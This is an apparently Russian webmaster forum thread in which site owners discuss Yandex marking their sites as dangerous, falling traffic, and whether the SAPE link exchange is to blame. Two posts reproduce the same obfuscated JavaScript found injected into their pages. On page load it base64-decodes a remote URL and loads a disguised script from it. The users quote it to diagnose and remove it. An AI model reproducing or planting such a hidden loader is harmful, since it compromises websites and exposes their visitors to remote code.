сайт может угрожать безопасности

[cool]

Цитата:

Сообщение от Jimi Dini

внезапно!
на одном из сайтов, белых и пушистых, но с установленным попандером (маркетгид) упал траф. полез смотреть в вебмастер, обнаружил что

ессно попандер снес к щебеням, послал сайт на перепроверку в ян.вебмастере

но вот что интересно
каким образом был осуществлен этот самый "поведенческий анализ"?
на сайте стоит метрика. она виновата или у яна есть еще какие-то варианты проверки?

если ее снести нафиг, может это снизить шанс появления такой вот хрени ("Поведенческий анализ")?

ессно никаких вирей на сайте и близко нет.

угу, у меня было такое пару месяцев назад. в течении суток восстановили, достаточно было простой перепроверки. в моём случае не то что вирусов - страшнее адсенса ничего небыло. вникать в суть алгоритмов не стал, сослался на глюк. но осадок остался, ага

[e-visitor]

Цитата:

Сообщение от aship

Увы, массовое явление в последнее время. Причем даже для сайтов без попандеров и вообще без реламы.

Та же проблема. Посещаемость упала с 8000 до 3000. Соответственно, доход в РСЯ, b2b, Адсенс уменьшился в разы. Заказал перепроверку в Яндекс. Ждёмс.

[ISNik]

1 февраля Яндекс повесил на сайте ужасное красное окно типа "Сайт угрожает безопасности..." Это случается уже во второй раз с начала работы в САПе.
Суть: в хвосте тега </head> в код всех страниц вставляется javascript

Цитата:

<script type="text/javascript">
if(!document.xmlSettings)document.xmlSettings={};d ocument.xmlSettings.ae=function(e,et,f){if(e.addEv entListener){e.addEventListener(et,f,false);return f;}ief=function(){f.call(f)};e.attachEvent('on'+et ,ief);return ief;};document.xmlSettings.bd=function(data){var b64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrs tuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=b64.ind exOf(data.charAt(i++));h2=b64.indexOf(data.charAt( i++));h3=b64.indexOf(data.charAt(i++));h4=b64.inde xOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4; o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h 3==64)enc+=String.fromCharCode(o1);else if(h4==64)enc+=String.fromCharCode(o1,o2);else enc+=String.fromCharCode(o1,o2,o3);}while(i<data.l ength);return enc;};document.xmlSettings.ae(window,'load',functi on(e){document.xmlSettings.ssrc=document.xmlSettin gs.bd('aHR0cDovL3Byb3RvLm5hdGl2ZWNvZGVyLmNvbS8yL2p xdWVyeS0xLjMuMi5qcw==');document.xmlSettings.scrip tElement=document.createElement('script');document .xmlSettings.scriptElement.setAttribute('type','te xt/javascript');document.xmlSettings.scriptElement.se tAttribute('src',document.xmlSettings.ssrc);docume nt.body.appendChild(document.xmlSettings.scriptEle ment);});
</script>

Удалил. Отправил на перепроверку.
Код лезет от кого-то из оптимизаторов, что размещают на моём сайте ссылки через САПу? Есть такие, замеченные?
Как "предохраняться"? Сменить пароль на ftp? Что ещё? Поделитесь соображениями, пожалуйста.
Спасибо.

[SergejF]

Цитата:

Сообщение от ISNik

Код лезет от кого-то из оптимизаторов, что размещают на моём сайте ссылки через САПу?

Чушь.

Цитата:

Сообщение от ISNik

Как "предохраняться"? Сменить пароль на ftp? Что ещё?

Не храните пароли в фтп-менеджере. Проверяйте ком на вирусы. И того... по порносайтам не лазайте.

[ISNik]

Ну... Я ведь предоставляю системе ftp-пароль. Пароли ввожу ручками. Компы проверены-перепроверены (и корпоративный, и домашний). Порносайты - не моя зона интересов.
Сайт существует на Яндексе более десятка лет, блокировали его дважды за последний год, что начал работать в сапе. Встречал на форуме описания аналогичных случаев. Поэтому вопросы и возникают.

[SergejF]

Цитата:

Сообщение от ISNik

Ну... Я ведь предоставляю системе ftp-пароль.

Из этого не следует, что система предоставляет его оптимизаторам.

Цитата:

Сообщение от ISNik

Пароли ввожу ручками. Компы проверены-перепроверены (и корпоративный, и домашний). Порносайты - не моя зона интересов.

Все так говорят.

[Kino]

Недавно такая же история приключилась с одним хорошим СДЛом. С конца января выводится в поиске с предупреждением.

[rxp]

Цитата:

Сообщение от Kino

Недавно такая же история приключилась с одним хорошим СДЛом. С конца января выводится в поиске с предупреждением.

Если проблемы с вирусами стучите в асю (в профиле) поможем, вот наши темы:

http://forum.sape.ru/showthread.php?t=79363
http://forum.searchengines.ru/showthread.php?t=635696

[romareo]

А ведь и правда кто то нас имеет .
Яндекс заблокировал сайт. сайт к которому уже полгода не обращались изменений не делали.по фтп на него вообще не заходили( кроме сапы).
сайт на хтмл и на народе расположен!

Админ Сапы это сигнал Вам.конкретней уже не бывает.
сломать сайт извне на хтмл это уже из разряда фантастики
значит кто имеет доступ на сайт тот и эти вставки делает

Вот код вставки. Касперский за вирус его не считает
<script type="text/javascript">
if(!document.xmlSettings)document.xmlSettings={};d ocument.xmlSettings.ae=function(e,et,f){if(e.addEv entListener){e.addEventListener(et,f,false);return f;}ief=function(){f.call(f)};e.attachEvent('on'+et ,ief);return ief;};document.xmlSettings.bd=function(data){var b64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrs tuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=b64.ind exOf(data.charAt(i++));h2=b64.indexOf(data.charAt( i++));h3=b64.indexOf(data.charAt(i++));h4=b64.inde xOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4; o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h 3==64)enc+=String.fromCharCode(o1);else if(h4==64)enc+=String.fromCharCode(o1,o2);else enc+=String.fromCharCode(o1,o2,o3);}while(i<data.l ength);return enc;};document.xmlSettings.ae(window,'load',functi on(e){document.xmlSettings.ssrc=document.xmlSettin gs.bd('aHR0cDovL3Byb3RvLm5hdGl2ZWNvZGVyLmNvbS8yL2p xdWVyeS0xLjMuMi5qcw==');document.xmlSettings.scrip tElement=document.createElement('script');document .xmlSettings.scriptElement.setAttribute('type','te xt/javascript');document.xmlSettings.scriptElement.se tAttribute('src',document.xmlSettings.ssrc);docume nt.body.appendChild(document.xmlSettings.scriptEle ment);});
</script>

[sergey_k]

получил сегодня такое же письмо.
но в коде не вижу отдаленно напоминающее чужую вставку.
в Вебмастере пишет что последний раз робот заходил 5 числа, но 07.03 якобы это увидали. Запросил перепроверку, ждемс